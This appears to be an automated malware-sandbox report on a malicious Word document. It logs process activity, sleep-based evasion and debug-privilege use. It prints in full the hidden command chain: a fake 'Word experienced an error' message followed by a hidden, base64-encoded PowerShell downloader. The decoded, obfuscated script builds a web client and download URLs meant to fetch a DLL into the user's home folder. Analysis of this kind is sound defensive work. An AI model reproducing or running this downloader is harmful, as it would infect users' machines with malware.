Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2536

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: powershell.exe, 00000004.00000002.2110680458.00000000001E7000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ			Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
